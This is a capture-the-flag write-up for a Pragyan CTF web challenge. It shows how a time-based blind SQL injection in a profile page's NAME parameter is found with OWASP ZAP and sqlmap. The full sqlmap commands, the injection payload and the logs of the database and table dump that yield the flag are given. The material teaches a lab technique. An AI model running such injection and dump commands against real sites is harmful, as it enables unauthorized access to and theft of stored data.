Tags: sqlinjection sqlmap web 

Rating:

The website at http://ctf.pragyan.org:14000/index.php allows one to register a user and log in, but shows no information afterwards and does not offer any further actions.

Running an *Active Scan* with *OWASP ZAP* shows a possible SQL injection vulnerability in the profile page:

![](https://i.imgur.com/9NtMbZy.png)

Running a basic assessment with SQLMap against the profile page, passing the session cookie so the requests are made as the logged-in user, confirms this:

```bash
$ sqlmap -u "http://ctf.pragyan.org:14000/profile.php?success=welcome&NAME=fooman" --cookie "PHPSESSID=c06fe05e8915a69cf66610e350dcfcb4"

...
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
...
[15:34:29] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[15:34:39] [INFO] GET parameter 'NAME' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[15:35:07] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:35:07] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[15:35:08] [INFO] checking if the injection point on GET parameter 'NAME' is a false positive
GET parameter 'NAME' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 131 HTTP(s) requests:
---
Parameter: NAME (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: success=welcome&NAME=fooman' AND (SELECT 7978 FROM (SELECT(SLEEP(5)))Kokv) AND 'llyd'='llyd
---
[15:35:58] [INFO] the back-end DBMS is MySQL
[15:35:58] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
back-end DBMS: MySQL >= 5.0.12
[15:35:59] [INFO] fetched data logged to text files under '/root/.sqlmap/output/ctf.pragyan.org'

[*] ending @ 15:35:59 /2020-02-23/
```

We can build on this to enumerate the database structure (`-p NAME` and `--dbms=MySQL` skip re-testing the other parameters and DBMS fingerprints):

```bash
$ sqlmap -u "http://ctf.pragyan.org:14000/profile.php?success=welcome&NAME=fooman" --cookie "PHPSESSID=c06fe05e8915a69cf66610e350dcfcb4" --dbms=MySQL --tables -p NAME

...
[15:38:01] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: NAME (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: success=welcome&NAME=fooman' AND (SELECT 7978 FROM (SELECT(SLEEP(5)))Kokv) AND 'llyd'='llyd
---
[15:38:01] [INFO] testing MySQL
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[15:38:18] [INFO] confirming MySQL
[15:38:18] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[15:38:29] [INFO] adjusting time delay to 2 seconds due to good response times
[15:38:29] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 8.0.0
[15:38:29] [INFO] fetching database names
[15:38:29] [INFO] fetching number of databases
[15:38:29] [INFO] retrieved: 2
[15:38:35] [INFO] retrieved: information_schema
[15:40:57] [INFO] retrieved: capture_the_flag
[15:43:16] [INFO] fetching tables for databases: 'capture_the_flag, information_schema'
[15:43:16] [INFO] fetching number of tables for database 'information_schema'
[15:43:16] [INFO] retrieved: 73
[15:43:29] [INFO] retrieved: ADMIN^C
```

Without `-D`, sqlmap also walks the 73 tables of `information_schema`, which is painfully slow over a time-based blind channel, so that run was interrupted (`^C`). Restricting the enumeration to the `capture_the_flag` schema:

```bash
$ sqlmap -u "http://ctf.pragyan.org:14000/profile.php?success=welcome&NAME=fooman" --cookie "PHPSESSID=c06fe05e8915a69cf66610e350dcfcb4" -p NAME --dbms=MySQL -D capture_the_flag --tables

...
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[15:46:33] [INFO] adjusting time delay to 1 second due to good response times
3
[15:46:34] [INFO] retrieved: pandoralocations
[15:47:49] [INFO] retrieved: pandoramsg
[15:48:11] [INFO] retrieved: pandorausers
Database: capture_the_flag
[3 tables]
+------------------+
| pandoralocations |
| pandoramsg |
| pandorausers |
+------------------+

```

The challenge description indicates that we need to find a location, so `pandoralocations` is the obvious table to dump:

```bash
$ sqlmap -u "http://ctf.pragyan.org:14000/profile.php?success=welcome&NAME=fooman" --cookie "PHPSESSID=c06fe05e8915a69cf66610e350dcfcb4" -p NAME --dbms=MySQL -D capture_the_flag -T pandoralocations --dump
...
[16:22:25] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: NAME (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: success=welcome&NAME=fooman' AND (SELECT 7978 FROM (SELECT(SLEEP(5)))Kokv) AND 'llyd'='llyd
---
[16:22:25] [INFO] testing MySQL
[16:22:25] [INFO] confirming MySQL
[16:22:25] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 8.0.0
[16:22:25] [INFO] fetching columns for table 'pandoralocations' in database 'capture_the_flag'
[16:22:25] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[16:22:32] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[16:23:05] [INFO] adjusting time delay to 2 seconds due to good response times
3
[16:23:06] [INFO] retrieved: base
[16:23:31] [INFO] retrieved: latitude
[16:24:31] [INFO] retrieved: longitude
[16:25:46] [INFO] fetching entries for table 'pandoralocations' in database 'capture_the_flag'
[16:25:46] [INFO] fetching number of entries for table 'pandoralocations' in database 'capture_the_flag'
[16:25:46] [INFO] retrieved: 3
[16:25:54] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
[16:26:08] [INFO] adjusting time delay to 1 second due to good response times
base1
[16:26:21] [INFO] retrieved: 10.0054 N
[16:27:09] [INFO] retrieved: 45.0245E
[16:27:52] [INFO] retrieved: base2
[16:28:11] [INFO] retrieved: p_ctf{4vengers_455emb1e_0ne_l45t_t1me}
[16:31:37] [INFO] retrieved: 56
...
```

The flag is stored in the `latitude` column of the `base2` row.

Flag: **p_ctf{4vengers_455emb1e_0ne_l45t_t1me}**